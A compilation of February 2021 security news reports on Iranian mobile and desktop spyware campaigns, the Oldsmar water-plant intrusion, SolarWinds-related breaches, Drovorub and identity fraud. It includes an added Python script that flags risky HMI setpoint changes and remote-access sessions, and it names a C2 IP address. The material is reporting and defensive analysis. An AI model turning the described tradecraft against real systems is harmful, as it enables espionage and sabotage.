Microsoft has tracked nation-state activity against the email accounts of its customers since 2016, and for years it has warned of state-sponsored hacking campaigns originating from China, Russia, and Iran.
Every time Microsoft experts have detected attacks from state-sponsored hackers, they have alerted users via email.
Unfortunately, not all users read the email alerts, or they read them only after a delay, giving the attackers time to conduct malicious activities.
To make the alerting service more efficient, Microsoft implemented it inside the dashboard of Microsoft Defender for Office 365 (previously known as Office 365 Advanced Threat Protection or Office 365 ATP).
Microsoft Defender for Office 365 protects all of Office 365 against advanced threats like business email compromise and credential phishing. It automatically investigates and remediates attacks.
The alerts are also sent to system administrators and security teams, who can directly contact the affected employees and take action to prevent their accounts from being taken over.
Microsoft plans to deploy the new notification feature by the end of February.
Microsoft is offering organizations that don’t yet have a license with support for Microsoft Defender for Office 365 a free 30-day evaluation.
Over 1,200 Iranians Targeted in Domestic Surveillance Campaign
9.2.2021 BigBrothers Securityweek
More than 1,200 Iranian citizens have been targeted in extensive cyber-surveillance operations backed by the Iranian government, researchers with cybersecurity firm Check Point report.
The attacks, which Check Point refers to collectively as Domestic Kitten, have been ongoing for roughly four years, orchestrated by a threat actor tracked as APT-C-50, which executes the campaigns on behalf of the Iranian government.
The targets of these attacks, the researchers say, are the Kurdish minority in Iran, opposition forces, internal dissidents, ISIS advocates, and other individuals that the Iranian regime believes could represent a threat.
A total of 10 unique campaigns were observed to date, including 4 that are currently active. The most recent of these campaigns started in November 2020. Two of the remaining three active campaigns have been ongoing since mid-2017, and the last one since mid-2018.
The attacks employed a broad range of vectors to trick victims into installing a malicious Android application: Telegram channels, text messages containing a link to the software, and an Iranian blog. More than 600 of the targeted individuals had their devices infected.
Dubbed FurBall and based on commercially available spyware called KidLogger, the malware leveraged in these attacks is capable of collecting information such as device identifiers, SMS messages, call logs, contact lists, user accounts, browsing history, and a list of installed applications.
Furthermore, it can access a device’s microphone and camera to record sound and video, can record calls, steal files (including from external storage), track the device’s location, and delete messages and files.
Once on the victim’s device, the malware masquerades as a fake mobile security application, a news app, a repackaged version of a game, an Android application store, a wallpaper application, or an application for a restaurant in Tehran.
The recent campaigns, Check Point says, leverage the same infrastructure that was used in attacks detailed in 2018.
In addition to victims in Iran, the operations targeted individuals worldwide, including the United States, the United Kingdom, Afghanistan, Pakistan, Turkey, and more.
Hacker Tried Poisoning Water Supply After Breaking Into Florida's Treatment System
9.2.2021 BigBrothers Thehackernews
Hackers successfully infiltrated the computer system controlling a water treatment facility in the U.S. state of Florida and remotely changed a setting that drastically altered the levels of sodium hydroxide (NaOH) in the water.
During a press conference held yesterday, Pinellas County Sheriff Bob Gualtieri said an operator managed to catch the manipulation in real-time and restored the concentration levels to undo the damage.
"At no time was there a significant effect on the water being treated, and more importantly the public was never in danger," Sheriff Gualtieri said in a statement.
The water treatment facility, which is located in the city of Oldsmar and serves about 15,000 residents, is said to have been breached for approximately 3 to 5 minutes by unknown suspects on February 5, with the remote access occurring twice at 8:00 a.m. and 1:30 p.m.
The attacker briefly increased the amount of sodium hydroxide from 100 parts-per-million to 11,100 parts-per-million using a system that allows for remote access via TeamViewer, a tool that lets users monitor and troubleshoot any system problems from other locations.
"At 1:30 p.m., a plant operator witnessed a second remote access user opening various functions in the system that control the amount of sodium hydroxide in the water," the officials said.
Sodium hydroxide, also known as lye, is a corrosive compound used in small amounts to control the acidity of water. In high and undiluted concentrations, it can be toxic and can cause irritation to the skin and eyes.
It is not immediately known if the hack was done from within the U.S. or outside the country. Detectives with the Digital Forensics Unit said an investigation into the incident is ongoing.
Although an early intervention averted more serious consequences, the sabotage attempt highlights the exposure of critical infrastructure facilities and industrial control systems to cyberattacks.
The fact that the attacker leveraged TeamViewer to take over the system underscores the need for securing access with multi-factor authentication and preventing such systems from being externally accessible.
"Manually identify software installed on hosts, particularly those critical to the industrial environment such as operator workstations — such as TeamViewer or VNC," said Dragos researcher Ben Miller. "Accessing this on a host-by-host basis may not be practical but it is comprehensive."
"Remote access requirements should be determined, including what IP addresses, what communication types, and what processes can be monitored. All others should be disabled by default. Remote access including process control should be limited as much as possible."
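The manipulation described above was caught by an operator watching the screen; the same check can be automated as a plausibility test on setpoint changes in the HMI audit trail. The following is an added example (not code from the article or from Dragos) that runs over constructed audit-log lines modelled on the incident; the tag name, the safe range and the session-origin labels are assumptions.

```python
"""Plausibility checks on HMI setpoint changes, modelled on the Oldsmar incident.

Flags a change when the new value leaves the engineering range, when it jumps
by an implausible factor, or when it was made from a remote session. This is
an added illustration; tag names, ranges and log format are constructed.
"""
from dataclasses import dataclass
from typing import Dict, List, Tuple

# Constructed sample audit lines (not real plant data):
# timestamp, operator id, session origin, tag, old value, new value
SAMPLE_LOG = """\
2021-02-05 07:55:12,op_jdoe,local,NAOH_DOSE_PPM,100,100
2021-02-05 08:02:41,op_remote,teamviewer,NAOH_DOSE_PPM,100,100
2021-02-05 13:31:09,op_remote,teamviewer,NAOH_DOSE_PPM,100,11100
2021-02-05 13:33:50,op_jdoe,local,NAOH_DOSE_PPM,11100,100
"""

# Engineering limits per tag, (min, max) in the tag's own units. Assumed
# values; a real plant would take these from its process documentation.
SAFE_RANGE: Dict[str, Tuple[float, float]] = {"NAOH_DOSE_PPM": (0.0, 200.0)}
MAX_RELATIVE_JUMP = 5.0          # flag a single change larger than 5x the old value
REMOTE_ORIGINS = {"teamviewer", "vnc", "rdp"}  # assumed session-origin labels


@dataclass
class SetpointChange:
    ts: str
    operator: str
    origin: str
    tag: str
    old: float
    new: float


@dataclass
class Finding:
    change: SetpointChange
    reasons: List[str]


def parse_log(text: str) -> List[SetpointChange]:
    """Parse the comma-separated audit format used by the constructed sample."""
    changes: List[SetpointChange] = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, op, origin, tag, old, new = line.split(",")
        changes.append(SetpointChange(ts, op, origin, tag, float(old), float(new)))
    return changes


def check_change(c: SetpointChange) -> List[str]:
    """Return the reasons a change is suspicious; an empty list means it looks fine."""
    reasons: List[str] = []
    if c.old == c.new:
        return reasons  # no actual change; nothing to assess
    lo, hi = SAFE_RANGE.get(c.tag, (float("-inf"), float("inf")))
    if not lo <= c.new <= hi:
        reasons.append(f"new value {c.new:g} outside safe range [{lo:g}, {hi:g}]")
    if c.old > 0 and c.new / c.old > MAX_RELATIVE_JUMP:
        reasons.append(f"jump of {c.new / c.old:.0f}x exceeds {MAX_RELATIVE_JUMP:g}x limit")
    if c.origin in REMOTE_ORIGINS:
        reasons.append(f"process-control change made from remote session ({c.origin})")
    return reasons


def audit(text: str) -> List[Finding]:
    """Run every line of an audit log through check_change and keep the hits."""
    findings: List[Finding] = []
    for c in parse_log(text):
        reasons = check_change(c)
        if reasons:
            findings.append(Finding(c, reasons))
    return findings


if __name__ == "__main__":
    for f in audit(SAMPLE_LOG):
        print(f"{f.change.ts} {f.change.tag} {f.change.old:g} -> {f.change.new:g}")
        for r in f.reasons:
            print("   -", r)
```

On the sample, only the 13:31 remote change from 100 to 11,100 ppm is reported; the operator's local restore to 100 ppm is within range and is not flagged.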
Detailed: Here's How Iran Spies on Dissidents with the Help of Hackers
9.2.2021 BigBrothers Thehackernews
Twin cyber operations conducted by state-sponsored Iranian threat actors demonstrate their continued focus on compiling detailed dossiers on Iranian citizens that could threaten the stability of the Islamic Republic, including dissidents, opposition forces, ISIS supporters, and Kurdish natives.
Tracing the extensive espionage operations to two advanced Iranian cyber-groups Domestic Kitten (or APT-C-50) and Infy, cybersecurity firm Check Point revealed new and recent evidence of their ongoing activities that involve the use of a revamped malware toolset as well as tricking unwitting users into downloading malicious software under the guise of popular apps.
"Both groups have conducted long-running cyberattacks and intrusive surveillance campaigns which target both individuals' mobile devices and personal computers," Check Point researchers said in a new analysis. "The operators of these campaigns are clearly active, responsive and constantly seeking new attack vectors and techniques to ensure the longevity of their operations."
Despite overlaps in the victims and the kind of information amassed, the two threat actors are considered to be independently operating from one another. But the "synergistic effect" created by using two different sets of attack vectors to strike the same targets cannot be overlooked, the researchers said.
Domestic Kitten Mimics a Tehran Restaurant App
Domestic Kitten, which has been active since 2016, has been known to target specific groups of individuals with malicious Android apps that collect sensitive information such as SMS messages, call logs, photos, videos, and location data on the device along with their voice recordings.
Spotting four active campaigns, the most recent of which began in November 2020 according to Check Point, the APT-C-50 actor has been found to leverage a wide variety of cover apps, counting VIPRE Mobile Security (a fake mobile security application), Exotic Flowers (a repackaged variant of a game available on Google Play), and Iranian Woman Ninja (a wallpaper app), to distribute a piece of malware called FurBall.
The latest November operation is no different: it takes advantage of a fake app for Mohsen Restaurant, located in Tehran, to achieve the same objective, luring victims into installing the app through multiple vectors — SMS messages with a link to download the malware, an Iranian blog that hosts the payload, and Telegram channels.
Prominent targets of the attack included 1,200 individuals located in Iran, the US, Great Britain, Pakistan, Afghanistan, Turkey, and Uzbekistan, the researchers said, with over 600 successful infections reported.
Once installed, FurBall grants itself wide permissions so that the app runs automatically on every device startup, then proceeds to collect browser history, hardware information, and files on the external SD card, and exfiltrates videos, photos, and call records every 20 seconds.
It also monitors clipboard content, gains access to all notifications received by the device, and comes with capabilities to remotely execute commands issued from a command-and-control (C2) server to record audio, video, and phone calls.
Interestingly, FurBall appears to be based on a commercially available Spyware called KidLogger, implying the actors "either obtained the KidLogger source-code, or reverse-engineered a sample and stripped all extraneous parts, then added more capabilities."
Infy Returns With New, Previously Unknown, Second-Stage Malware
First discovered in May 2016 by Palo Alto Networks, Infy's (also called Prince of Persia) renewed activity in April 2020 marks a continuation of the group's cyber operations that have targeted Iranian dissidents and diplomatic agencies across Europe for over a decade.
While their surveillance efforts took a beating in June 2016 following a takedown operation by Palo Alto Networks to sinkhole the group's C2 infrastructure, Infy resurfaced in August 2017 with anti-takeover techniques alongside a new Windows info-stealer called Foudre.
The group is also suggested to have ties to the Telecommunication Company of Iran after researchers Claudio Guarnieri and Collin Anderson disclosed evidence in July 2016 that a subset of the C2 domains redirecting to the sinkhole was blocked by DNS tampering and HTTP filtering, thus preventing access to the sinkhole.
Then in 2018, Intezer Labs found a new version of the Foudre malware, version 8, that also contained an "unknown binary" — now named Tonnerre by Check Point — that is used to expand on the capabilities of the former.
"It seems that following a long downtime, the Iranian cyber attackers were able to regroup, fix previous issues and dramatically reinforce their OPSEC activities as well as the technical proficiency and abilities of their tools," the researchers said.
As many as three versions of Foudre (20-22) have been uncovered since April 2020, with the new variants downloading Tonnerre 11 as the next-stage payload.
The attack chain begins with phishing emails containing lure documents written in Persian that, when closed, run a malicious macro that drops and executes the Foudre backdoor, which then connects to the C2 server to download the Tonnerre implant.
Besides executing commands from the C2 server, recording sounds, and capturing screenshots, what makes Tonnerre stand out is its use of two sets of C2 servers — one to receive commands and download updates using HTTP and a second server to which the stolen data is exfiltrated via FTP.
At 56MB, Tonnerre's unusual size is also likely to work in its favor and evade detection as many vendors ignore large files during malware scans, the researchers noted.
However, unlike Domestic Kitten, only a few dozen victims were found to be targeted in this attack, including those from Iraq, Azerbaijan, the U.K., Russia, Romania, Germany, Canada, Turkey, the U.S., Netherlands, and Sweden.
"The operators of these Iranian cyber espionage campaigns seem to be completely unaffected by any counter-activities done by others, even though they were revealed and even stopped in the past — they simply don't stop," said Yaniv Balmas, head of cyber research at Check Point.
"These campaign operators simply learn from the past, modify their tactics, and go on to wait for a while for the storm to pass to only go at it again. Furthermore, it's worthy to note the sheer amount of resources the Iranian regime is willing to spend on exerting their control."
Microsoft Says Its Services Not Used as Entry Point by SolarWinds Hackers
6.2.2021 BigBrothers Securityweek
In response to speculation that its services may have been leveraged as an initial entry point by the hackers who breached IT management firm SolarWinds, Microsoft said on Thursday there was no evidence to back those claims.
Reports, including from several mainstream media publications, have speculated about the role of Microsoft services in the SolarWinds attack and other operations conducted by the same threat group. The Wall Street Journal reported on February 2 that even SolarWinds’ new CEO, Sudhakar Ramakrishna, said one of the several theories was that the attackers may have compromised his company’s Office 365 accounts and then used that as an initial point of entry.
However, in a blog post published on the SolarWinds website on February 3, Ramakrishna said that while the attackers did leverage Microsoft services as part of the attack, the investigation so far leads them to believe that “the most likely attack vectors came through a compromise of credentials and/or access through a third-party application via an at the time zero-day vulnerability.”
He clarified, “While we’ve confirmed suspicious activity related to our Office 365 environment, our investigation has not identified a specific vulnerability in Office 365 that would have allowed the threat actor to enter our environment through Office 365.
“We’ve confirmed that a SolarWinds email account was compromised and used to programmatically access accounts of targeted SolarWinds personnel in business and technical roles. By compromising credentials of SolarWinds employees, the threat actors were able to gain access to and exploit our Orion development environment,” Ramakrishna added.
In a blog post on Thursday, Microsoft, which dubbed the attack “Solorigate,” also said there was no indication that SolarWinds was attacked via Office 365.
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) revealed recently that many of the organizations targeted by the SolarWinds hackers were breached through attack vectors that did not involve the SolarWinds supply chain attack, leaving many to speculate that Microsoft services may have been abused.
Microsoft said on Thursday that while data hosted in Microsoft email and other services was targeted by the hackers “post compromise,” it had found no evidence that its services were used as an initial entry point into the systems of organizations, claiming that the attackers apparently gained privileged credentials “in some other way.”
“From the beginning, we have said that we believe this is a sophisticated actor that has many tools in its toolkit, so it is not a surprise that a sophisticated actor would also use other methods to gain access to targets. In our investigations and through collaboration with our industry peers, we have confirmed several additional compromise techniques leveraged by the actor, including password spraying, spearphishing, use of webshell, through a web server, and delegated credentials,” Microsoft said.
After the SolarWinds supply chain attack came to light, Microsoft said it had notified some customers about suspicious activity related to their Azure and Microsoft 365 accounts. The list of organizations alerted by Microsoft includes cybersecurity firms CrowdStrike, which said the attackers attempted to read emails but failed, and Malwarebytes, which admitted that the hackers did gain access to “a limited subset of internal company emails.”
Second SolarWinds Attack Group Breaks into USDA Payroll — Report
4.2.2021 BigBrothers Threatpost
A second APT, potentially linked to the Chinese government, could be behind the Supernova malware.
There had been hints that a second group of malicious actors may have exploited a SolarWinds bug to install the Supernova backdoor — notably, there was a conclusion by Microsoft back in December that this was the case. Now, sources told Reuters that there’s evidence that a separate advanced persistent threat (APT), likely China-backed, is behind the malware.
Reuters reported that the group targeted a Department of Agriculture payroll system, called the National Finance Center (NFC). According to Reuters, the APT’s infrastructure used in the USDA attack matches that known to be deployed by government-backed Chinese actors.
The group used a “separate vulnerability” from the Sunburst backdoor that was at the heart of the sprawling espionage campaign that came to light in December, according to Reuters. That original effort (a Russian APT is believed to be responsible) used trojanized software updates for the SolarWinds Orion network-management platform to disseminate the Sunburst malware to SolarWinds customers in a supply-chain attack. The threat actors then used that initial compromise to perform follow-on espionage attacks on selected targets.
SolarWinds confirmed that the new APT offensive was not a supply-chain attack; instead, the cyberattackers exploited a software vulnerability in Orion after it was installed in targets’ networks, in order to install the backdoor called Supernova. It was originally discovered in December, and Microsoft noted at the time that because the malware didn’t match the fingerprints of the Sunburst attack, Supernova may have originated from another APT group.
“The customer’s network was compromised in a way that was unrelated to SolarWinds,” a SolarWinds-provided statement said. “That breach enabled the attackers to add the malicious Supernova code to Orion software on the customer’s network. We are aware of one instance of this happening and there is no reason to believe these attackers were inside the SolarWinds environment at any time. This is separate from the broad and sophisticated attack that targeted multiple software companies as vectors.”
Supernova is malware designed to appear to be part of a SolarWinds product. According to a SolarWinds advisory, it consists of two components.
“The first was a malicious, unsigned webshell DLL, ‘app_web_logoimagehandler.ashx.b6031896.dll,’ specifically written to be used on the SolarWinds Orion platform. The second is the utilization of a vulnerability in the Orion platform to enable deployment of the malicious code. This vulnerability in the Orion platform has been resolved in the latest updates.”
It should be noted that there is some question about the exact nature of the USDA cyberattack. First, a USDA spokesman told Reuters, “USDA has notified all customers (including individuals and organizations) whose data has been affected by the SolarWinds Orion code compromise.”
But, after Reuters published its story, it was updated with a follow-up statement from USDA correcting its earlier response, adding “there was no data breach related to SolarWinds.”
Threatpost has reached out for clarification.
Nation-State ‘Surfing’
The two SolarWinds-based attacks weren’t coordinated, but rather done in parallel with one another, which former U.S. Chief Information Security Officer Gregory Touhill told Reuters was common. He said this isn’t the “first time we’ve seen a nation-state actor surfing behind someone else,” which suggests that the Supernova attack group may have been aware of what the Russian APT was doing.
USDA’s hack brings the tally of compromised federal agencies related to SolarWinds to at least seven. The six previously breached by the Russians include the Departments of Energy, Homeland Security, Treasury, Commerce, Defense and the National Institute of Health.
Reuters added that its reporting could not establish the full scope of the Supernova attack.
Sunburst APT Infiltrated SolarWinds in 2019
Starting in Feb. 2020, a Russian APT used Sunburst-laden product updates that were pushed out to more than 18,000 SolarWinds customers all over the world. There they lurked for nine months waiting for the right time to strike with follow-on attacks.
The Wall Street Journal reported this week that there is new evidence the Russian attackers were present in SolarWind’s Office 365 email system well before that — since December 2019.
“Some email accounts were compromised,” SolarWinds’ new CEO Sudhakar Ramakrishna told the outlet. “That led them to compromise other email accounts and as a result our broader (Office) 365 environment was compromised.”
The nation-state backed adversaries didn’t just target government agencies; they also compromised security vendors, including CrowdStrike, Fidelis, FireEye, Malwarebytes, Palo Alto Networks and Qualys.
Aftermath: Biden Earmarks $10B for Cybersecurity
The new Biden administration has pledged additional resources to shore up the U.S. government’s cybersecurity efforts, earmarking a $10 billion down payment to expand the Cybersecurity and Infrastructure Security Agency (CISA). The SolarWinds cleanup will be a first priority. Tom Kellermann, researcher with VMWare Carbon Black, calls it a good “down payment.”
“That number should probably be about $100 billion over time,” said Kellermann. “And I hope that there’s a classified cybersecurity spend that exceeds that, in a classified… military appropriation budget.”
While government agencies continue to find out just how deep, wide and devastating the SolarWinds breach really was, this incident should serve as a warning to every system administrator across the world about proper security hygiene, researchers said.
“It’s not surprising to see China — or any adversary with strong forensic and coding capabilities — working to discover and exploit flaws in any software that touches sensitive information such as payroll,” Rosa Smothers, a former CIA threat analyst and current vice president at KnowBe4 said via email. “SolarWinds released a patch in December to repair this vulnerability, which reinforces what we’ve said all along: Patch your systems early and often.”
Alleged China-linked hackers used SolarWinds bug to breach National Finance Center
4.2.2021 BigBrothers Securityaffairs
Alleged China-linked hackers have exploited a flaw in the SolarWinds Orion software to hack systems at the U.S. National Finance Center.
FBI investigators discovered that allegedly China-linked hackers have exploited a flaw in the SolarWinds Orion software to break into the systems of the U.S. National Finance Center.
The National Finance Center is a federal payroll agency in the U.S. Department of Agriculture, that provides human resources and payroll services to hundreds of federal agencies.
The incident has not been linked to the recently disclosed SolarWinds supply chain attack; in the attack against the NFC, the threat actors exploited a different vulnerability.
“Two people briefed on the case said FBI investigators recently found that the National Finance Center, a federal payroll agency inside the U.S. Department of Agriculture, was among the affected organizations, raising fears that data on thousands of government employees may have been compromised.” reported the Reuters agency.
“The software flaw exploited by the suspected Chinese group is separate from the one the United States has accused Russian government operatives of using to compromise up to 18,000 SolarWinds customers, including sensitive federal agencies, by hijacking the company’s Orion network monitoring software.”
SolarWinds announced it was aware of a successful attack carried out by the second hacker group, but did not attribute it to a specific threat actor. The software provider pointed out that hackers did not compromise its internal network and confirmed that it had already addressed the flaw exploited in the attack.
“In the case of the sole client it knew about, SolarWinds said the hackers only abused its software once inside the client’s network. SolarWinds did not say how the hackers first got in, except to say it was ‘in a way that was unrelated to SolarWinds.’” continues the Reuters report.
The U.S. Department of Agriculture confirmed the security breach and “has notified all customers (including individuals and organizations) whose data has been affected by the SolarWinds Orion Code Compromise.”
Later, a different USDA spokesman denied that the NFC was hacked and added that “there was no data breach related to Solar Winds” at the agency.
According to Reuters’ sources who spoke on condition of anonymity, the threat actors’ tools and C2 infrastructure were employed in past attacks conducted by China-linked threat actors.
The Chinese foreign ministry denied the involvement of China in this attack and invited the US authorities to support these allegations with evidence.
“China resolutely opposes and combats any form of cyberattacks and cyber theft,” it said in a statement.
At the time of this writing, Reuters was not able to determine the type and the volume of information the attackers have stolen from the National Finance Center (NFC). Experts highlighted that the potential impact of this security breach could be severe due to the type of data managed by the US agency.
China-Linked Hackers Exploited SolarWinds Flaw in U.S. Government Attack: Report
4.2.2021 BigBrothers Securityweek
Hackers believed to be from China have exploited a vulnerability in a SolarWinds product as part of a campaign targeting at least one U.S. government agency, Reuters reported on Tuesday.
In late December, a few weeks after it came to light that Texas-based IT management solutions provider SolarWinds was targeted in a sophisticated supply chain attack, researchers from several organizations revealed that one of the pieces of malware they had analyzed, dubbed Supernova, had apparently been used by a second group that was not related to the supply chain attack.
The supply chain attack, which has been linked to Russian threat actors, involved a breach of SolarWinds systems and the delivery of malware through updates for the company’s Orion monitoring product. These updates were delivered to thousands of SolarWinds customers, and a few hundred organizations that were of interest to the attackers also received other payloads that may have given the hackers deep access to their systems.
In the case of Supernova, however, the attackers apparently did not gain access to SolarWinds systems. Instead, they exploited a zero-day vulnerability in the Orion platform and delivered the Supernova malware only after they gained access to the targeted networks. SolarWinds patched the vulnerability involved in the Supernova attack in December. The flaw, tracked as CVE-2020-10148, has been described as an authentication bypass issue that allows remote command execution.
Reuters learned from people with knowledge of the investigation into Supernova that the infrastructure and tools used in the attack provided a link to cyberspies believed to be backed by the Chinese government.
SolarWinds told Reuters that it’s only aware of a single customer being targeted with the Supernova malware, but it did not name the customer and said it could not conclusively determine who was behind the attack.
Reuters reported that one victim of the Supernova attack was the National Finance Center (NFC), an agency inside the U.S. Department of Agriculture that reportedly handles payroll for several government organizations, including the State Department, FBI, Treasury Department, and the DHS.
The USDA initially confirmed being affected by the “SolarWinds Orion code compromise” and said all impacted customers had been notified — this could refer to the Russia-linked attack — but then said the NFC was not hacked, without providing clarifications.
The Chinese government has denied being responsible for the attack.
While SolarWinds enabled hackers to gain access to the systems of many organizations through the supply chain attack, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) reported recently that many of the entities targeted by this threat actor actually had no direct link to SolarWinds — roughly 30% of identified victims did not use the company’s products.
The Drovorub Mystery: Malware NSA Warned About Can't Be Found
4.2.2021 BigBrothers Securityweek
NSA and FBI Released Detailed Information on Drovorub Linux Malware, But Major Cybersecurity Firms Found No Samples
A piece of malware linked by U.S. intelligence agencies to hackers believed to be backed by the Russian government remains a mystery to the private sector, which apparently hasn’t found a single sample of the malware, and one researcher went as far as suggesting that it may be a false flag set up by the United States itself.
In August 2020, the NSA and the FBI released a joint cybersecurity advisory detailing a piece of malware they named Drovorub. According to the agencies, Drovorub was designed to target Linux systems as part of cyber espionage operations conducted by Russia’s General Staff Main Intelligence Directorate (GRU) 85th Main Special Service Center (GTsSS) military unit 26165, which has been linked to attacks conducted by the threat actor tracked as APT 28, Fancy Bear, Sednit and Strontium.
The 45-page report released by the NSA and FBI describes Drovorub as a “Linux malware toolset” that consists of an implant with a kernel module rootkit, a file transfer and port forwarding tool, and a command and control (C&C) server.
“When deployed on a victim machine, the Drovorub implant (client) provides the capability for direct communications with actor-controlled C2 infrastructure; file download and upload capabilities; execution of arbitrary commands as ‘root’; and port forwarding of network traffic to other hosts on the network,” the agencies wrote in their advisory.
The advisory shares information on how Drovorub works, how it can be detected, and how organizations can protect their systems against attacks involving the malware.
In November, French industrial giant Schneider Electric issued an advisory to warn customers about the potential threat posed by Drovorub to some of its products, but the company told SecurityWeek at the time that it hadn’t been aware of any actual incident involving the malware — its alert was issued based on the information from the NSA advisory.
In fact, no one in the private sector appears to have seen Drovorub attacks, or samples of the malware. SecurityWeek has reached out to several major cybersecurity solutions providers and no one seems to have obtained actual samples — or at least they’re currently not willing to share any information — despite the fact that the NSA’s advisory contains Snort rules, Yara rules and other technical information that would make it easy to find the malware on infected systems.
Contacted companies include Bitdefender, Symantec, ESET, Trend Micro, CrowdStrike, Google’s Chronicle, Kaspersky, FireEye, Microsoft, and ReversingLabs.
“It’s a highly advanced sample, used in very targeted ways by a very sophisticated threat actor against a small number of selected targets. So by the very nature of it, you will only get such a sample if one of those victims discloses it, and if those victims are themselves highly sensitive – it is unlikely they would disclose that,” Robert McArdle, director of Trend Micro's Forward Looking Threat Research, said via email.
ESET said it had not seen Drovorub or any similar malware in the wild.
“Unlike mass-spreading malware, it looks like this malware is used in targeted intrusions against a small set of victims,” ESET researcher Anton Cherepanov told SecurityWeek. “In addition to that, usually Linux servers don't have any security software in place. That's why it's really hard to find samples of this malware in the wild.”
SecurityWeek has also reached out to the NSA and the FBI to see if the agencies had shared samples with the private sector or if they had plans to do so. The NSA did not respond and the FBI said it does not have any additional information to share beyond what was published in the advisory.
Drovorub is also mentioned in a recently published 400-page book, titled “Loaded for Guccifer2.0: Following A Trail of Digital Geopolitics,” written by David Jonathon Blake. In his book, Blake goes as far as suggesting that Drovorub is a false flag deployed by the United States to make it appear as if Russia was preparing an attack on critical infrastructure.
The author says he’s not a security expert, but claims that for the past several years — full time, for a large part of it — he has been researching what he believes to be false flag operations set up and conducted by the U.S. in an effort to blame Russia for various cyberattacks. The book, which suggests that even the 2016 attack on the Democratic National Committee was actually conducted by U.S. agencies, is a combination of technical research and speculation, and sounds very much like conspiracy theory.
In their report, the NSA and FBI shared little information on how they linked Drovorub to Russian intelligence. As an example related to attribution, they provide an IP address, 185.86.149.125, used by the malware for C&C, which was at some point allegedly accessed by an IP previously linked by Microsoft to Strontium.
Blake said 185.86.149.125 was associated with a physical server located in Latvia, but the IP address was also connected to a domain apparently registered by someone in a Russian city where the GRU is known to have a presence. However, the author claims that the same domain — for a very short while in 2018 — resolved to an IP address that always belonged to a major US tech company that provides services to the U.S. government.
Identity Theft Spikes Due to COVID-19 Relief
3.2.2021 BigBrothers Threatpost
Cases reported to the FTC doubled last year as cybercriminals took advantage of increased filing for government relief benefits due to the pandemic.
Cases of identity theft in the United States doubled in 2020, mainly due to cybercriminals taking advantage of people affected economically by COVID-19 who filed to receive government benefits.
The figures come from the Federal Trade Commission (FTC), which received about 1.4 million reports of identity theft last year, as detailed in a blog post published Monday, when the commission kicked off its annual “Identity Theft Awareness Week.”
“Repeatedly, identity thieves targeted government funds earmarked to help people hard hit financially by the pandemic,” according to the post by Seena Gressin, an attorney with the Division of Consumer and Business Education at the FTC.
In 2020, there were 394,280 reports about government benefits fraud compared with 12,900 reports in 2019. Most of these involved people filing for unemployment benefits, which experienced a sharp rise in 2020 due to the pandemic, Gressin noted.
In 2020, the U.S. government expanded unemployment benefits to people left jobless by the pandemic, something cybercriminals took as an opportunity to file unemployment claims using other people’s personal information, she wrote.
In one such high-profile case, rapper Fontrell Antonio Baines, who goes by the stage name “Nuke Bizzle,” boasted about perpetrating exactly this crime in his music video “EDD”—a reference to the California Employment Development Department.
The video shows Nuke Bizzle and his cohorts collecting EDD envelopes from various mailboxes, filing fraudulent claims on a laptop and spending wads of cash. Bizzle was subsequently arrested and ordered to stand trial in a U.S. District Court in Los Angeles.
Seasoned cybercriminals also aimed to cash in on COVID-19-related unemployment claims, with more success than the ill-fated rapper. The highly organized Nigerian cybergang Scattered Canary, for instance, walked off with millions in business e-mail compromise (BEC)-related fraudulent claims made on the online unemployment websites of eight U.S. states, according to a report released in May.
Small Business COVID-19 Fraud
People aiming to receive funds from government-sponsored small-business loan programs also experienced a rise in identity-theft crimes, according to the FTC. People reported 99,650 cases of fraud involving business or personal loans, compared with 43,920 reports in 2019.
Indeed, small businesses were some of the organizations most dramatically affected by COVID-19 economic shutdowns in 2020, and many business owners filed for federal relief. While “not all of the new reports related to the government-relief effort,” Gressin acknowledged, “they were a big share of the increase.”
Taxpayer Data and Stimulus Checks
Cybercriminals also used identity theft to target stimulus checks that the U.S. government paid out to the taxpayers, boosting the number of tax-related cases of this type of cybercrime, according to the FTC. In 2020, the FTC got 89,390 reports of tax-identity theft, compared with 27,450 reports in 2019.
Tax-based identity theft has traditionally been a popular tactic by cybercriminals to pilfer people’s yearly tax-return payments; however, in 2020 the number of online tax-fraud reports “began to swell when distribution of the stimulus payments began,” according to Gressin.
Indeed, hacker forums saw an increase in buying and selling taxpayer data around the time the COVID-19 relief package was announced, alongside the usual phishing and other campaigns typically used to steal annual tax payouts, according to a report released in May.
The FTC and its partners are co-hosting a series of free events this week around identity theft to help inform consumers. More info is available on the FTC’s website.
SolarWinds Hack Prompts Congress to Put NSA in Encryption Hot Seat
2.2.2021 BigBrothers Threatpost
Congress is demanding the National Security Agency come clean on what it knows about the 2015 supply-chain attack against Juniper Networks.
Members of Congress are demanding the U.S. National Security Agency (NSA) reveal what it knows about the 2015 Juniper Networks supply-chain delivery breach. In a letter sent by U.S. Senator Ron Wyden and nine additional members of Congress, the lawmakers demand a full account of the NSA-designed encryption algorithm compromised in 2015.
Sparking the inquest is the massive SolarWinds supply-chain attack. In their letter sent last week to the NSA, lawmakers suggest the spy agency is lacking effective oversight of software supply-chains relied upon by the U.S. government and private industry.
“In 2015, Juniper revealed a security breach in which hackers modified the software the company delivered to its customers,” a Wyden statement read. “Researchers subsequently discovered that Juniper had been using an NSA-designed encryption algorithm, which experts had long argued contained a backdoor, and that the hackers modified the key to this backdoor.”
A chief bone of contention among lawmakers is the allegation that the NSA’s “Dual_EC_DRBG” algorithm – submitted to National Institute of Standards and Technology (NIST) – contained an encryption backdoor for the spy agency. The move, lawmakers suggest, concerns Congress because it appears to be a tacit endorsement of weak encryption.
“The American people have a right to know why NSA did not act after the Juniper hack to protect the government from the serious threat posed by supply chain hacks. A similar supply chain hack was used in the recent SolarWinds breach, in which several government agencies were compromised with malware snuck into the company’s software updates,” the members wrote.
Why Juniper Illustrates Dangers of Intentionally Weak Crypto
In 2016, Juniper removed the backdoored Dual_EC DRBG algorithm, impacting its ScreenOS operating system. NIST also withdrew the algorithm, citing security concerns.
Juniper’s use of Dual_EC dates to 2008, at least a year after Dan Shumow and Niels Ferguson’s landmark presentation at the CRYPTO conference, which first cast suspicion on Dual_EC being backdoored by the NSA.
To many, Juniper’s move to remove Dual_EC (and also the ANSI X9.31 PRNG) confirmed the widely held belief that the vulnerabilities were tied to NSA operations described in a 2013 article published by the German publication Der Spiegel. That article described the existence of a catalog of hardware and software tools used by the NSA to infiltrate equipment manufactured by Juniper, Cisco and Huawei. The story was based on documents leaked in 2013 by former contractor Edward Snowden.
